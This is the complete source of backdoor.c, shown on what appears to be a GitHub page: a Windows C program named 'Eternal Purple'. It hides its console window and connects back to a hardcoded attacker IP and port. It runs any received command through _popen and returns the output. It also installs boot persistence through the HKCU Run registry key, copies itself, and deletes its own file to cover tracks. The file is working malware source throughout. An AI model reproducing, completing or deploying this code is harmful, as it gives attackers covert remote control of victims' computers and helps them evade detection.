-
Notifications
You must be signed in to change notification settings - Fork 7
Expand file tree
/
Copy pathbackdoor.c
More file actions
252 lines (208 loc) · 7.27 KB
/
Copy pathbackdoor.c
File metadata and controls
252 lines (208 loc) · 7.27 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <winsock2.h>
#include <windows.h>
#include <wininet.h>
#include <winuser.h>
#include <windowsx.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <tchar.h>
//Function that sets variable to 0 Used to reinitialize buff and other arrays
#define bzero(p, size) (void) memset ((p), 0, (size))
unsigned short ServPort = 8888;//Server Port
char *ServIP = "192.168.1.49";//Server IP
int stealth_bool = 1;//Change to 0 to hide window <-------Change stealth HERE
//--Other Vars
int zombie_bool = 0;//If shell mode is enabled
int sock;
//BOOTRUN used to enable persistance on victims machine(autorun on boot)
int bootRun(){
//Output Strings declaration
char err[128] = "Failed\n";//Error String
char suc[128] = "Created Persistance at \\HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\n";//Success output string
TCHAR szPath[MAX_PATH];
DWORD pathLen = 0;
pathLen = GetModuleFileName(NULL, szPath, MAX_PATH);//get path to our malware
if (pathLen == 0) {
send(sock, err, sizeof(err),0);
return -1;
}
HKEY NewVal;//Handle to an open registrty key
if(RegOpenKey(HKEY_CURRENT_USER, TEXT("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"),&NewVal) != ERROR_SUCCESS){
send(socket, err, sizeof(err),0);
return -1;
}
DWORD pathLenInBytes = pathLen * sizeof(*szPath);
if(RegSetValueEx(NewVal, TEXT("Eternal Purple"), 0, REG_SZ, (LPBYTE)szPath, pathLenInBytes) != ERROR_SUCCESS){
RegCloseKey(NewVal);
send(sock, err, sizeof(err), 0);
return -1;
}
//If everything checks out fine Close the key and send success mesage to server
RegCloseKey(NewVal);
send(sock,suc, sizeof(suc),0);
return 0;
}
//STRCUT used for cuting aruents out of commands
//pre: String str is a char array containing string to cut, slice from is the position from wich we will cut, slice to is the position final character
//post: Returns pointer to char array wich contains cut string
char *
str_cut(char str[], int slice_from, int slice_to){
if (str[0] == '\0') return NULL;
char *buffer;
size_t str_len, buffer_len;
if(slice_to < 0 && slice_from > slice_to){
str_len = strlen(str);
if (abs(slice_to) > str_len - 1)
return NULL;
if (abs(slice_from) > str_len)
slice_from = (-1) * str_len;
buffer_len = slice_to - slice_from;
str += (str_len + slice_from);
}else if (slice_from >= 0 && slice_to > slice_from){
str_len = strlen(str);
if (slice_from > str_len - 1)
return NULL;
buffer_len = slice_to - slice_from;
str += slice_from;
} else
return NULL;
buffer = calloc(buffer_len, sizeof(char));
strncpy(buffer, str, buffer_len);
return buffer;
}
int replicate() {
TCHAR szFileName[MAX_PATH];
DWORD dwResult = GetModuleFileName(NULL, szFileName, MAX_PATH);
if (dwResult == 0) {
_tprintf(_T("GetModuleFileName failed with error %d\n"), GetLastError());
return 1;
}
TCHAR szDestinationFile[MAX_PATH];
char ret[128];
TCHAR szFileExtension[MAX_PATH];
_tsplitpath(szFileName, NULL, NULL, NULL, szFileExtension);
_stprintf(szDestinationFile, _T("%s_copy%s"), szFileName, szFileExtension);
BOOL bResult = CopyFile(szFileName, szDestinationFile, FALSE);
if (!bResult) {
_tprintf(_T("CopyFile failed with error %d\n"), GetLastError());
send(sock,ret, sizeof(ret),0);
return 1;
}
sprintf(ret,("Copied %s to %s\n"), szFileName, szDestinationFile);
send(sock,ret, sizeof(ret),0);
return 0;
}
int panic() {
TCHAR szFileName[MAX_PATH];
DWORD dwResult = GetModuleFileName(NULL, szFileName, MAX_PATH);
if (dwResult == 0) {
return 1;
}
STARTUPINFO si;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
PROCESS_INFORMATION pi;
ZeroMemory(&pi, sizeof(pi));
TCHAR szCommandLine[MAX_PATH];
_stprintf(szCommandLine, _T("cmd /c del \"%s\""), szFileName);
BOOL bResult = CreateProcess(NULL, szCommandLine, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
if (!bResult) {
return 1;
}
WaitForSingleObject(pi.hProcess, INFINITE);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
return 0;
}
//Main Function wich is called
void Shell(){ //Once connected execute custom commands or bash
char buffer[1024];
char container[1024];
char total_response[18384];
int sh_bool = 1;
while (sh_bool == 1) {
jump:
bzero(buffer,1024);
bzero(container, sizeof(container));
bzero(total_response, sizeof(total_response));
recv(sock, buffer, 1024, 0);
//-----ETERNALPURPLE-COMMANDS------
if (strncmp("q", buffer, 1) == 0) {//Use "q" to terminate process
closesocket(sock);
WSACleanup();
exit(0);
}
else if(strncmp("cd ",buffer,3) == 0){//Use cd to change directory
chdir(str_cut(buffer,3,100));
}
else if(strncmp("persist", buffer, 7) == 0){//Use "persist" to try enable boot run
bootRun();
}
else if(strncmp("zombie", buffer, 6) == 0){//Use "zombie" to background current session( malware will keep trying to connect back to you)
char zomb[128] = "Zombie Mode Enabled \n";
send(sock, zomb, sizeof(zomb),0);
zombie_bool= 1;
sh_bool = 0;
}
else if(strncmp("panic", buffer, 5) == 0){//Use "panic" to clean up all tracks and terminate connection
panic();
char panic[128] = "Cleaning Up and Exiting ... \n";
send(sock, panic, sizeof(panic),0);
}
else if(strncmp("replicate", buffer, 9) == 0){//make copy in the same folder
char repl[128] = "Replicating executable\n";
send(sock, repl, sizeof(repl),0);
int ret = replicate();
}
else { //Else send raw data
FILE *fp; //Create File descriptor
fp = _popen(buffer, "r"); // open a process and execute command from buffer (r = read)
while(fgets(container,1024,fp) != NULL) { //Fgets streams data from a variable to another one fp -> container. Get 1024B and concatenate them into total_response .if there is still data in fp, repeat loop
strcat(total_response, container);
}
send(sock, total_response, sizeof(total_response), 0);//once total response is filled send the data to the Attackers Machine
fclose(fp);//Close file descriptor fd used to get command return
}
}
}
void connect_victim(){
struct sockaddr_in ServAddr;
WSADATA wsaData;
if(WSAStartup(MAKEWORD(2,0), &wsaData) != 0){
exit(1);//Error control
}
sock = socket(AF_INET, SOCK_STREAM, 0);
memset(&ServAddr, 0, sizeof(ServAddr));
ServAddr.sin_family = AF_INET;
ServAddr.sin_addr.s_addr = inet_addr(ServIP);
ServAddr.sin_port = htons(ServPort);
//3) TRY TO CONNECT
start:
while( connect(sock, (struct sockaddr *) &ServAddr, sizeof(ServAddr)) != 0){
Sleep(30);
goto start;
}
}
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrev, LPSTR lpCmdLine, int nCmdShow){
//1) HIDE PROCESS FROM TARGET
HWND stealth;
AllocConsole();
stealth = FindWindow("ConsoleWindowClass", NULL);
ShowWindow(stealth, stealth_bool);
do{
if(stealth_bool == 0) printf("Trying to connect to server\n");
//2) DEFINE NETWORKNG STUFF NEEDED
connect_victim();
//4)If connection was succesful EXECUTE SHELL funciont (main functionalities)
if(stealth_bool == 0) printf("Connected entering Shell mode\n");
Shell();
if(stealth_bool == 0) printf("Exited Shell\n");
}while(zombie_bool==1);
//End of execution
if(stealth_bool == 0) printf("Exiting\n");
exit(0);
}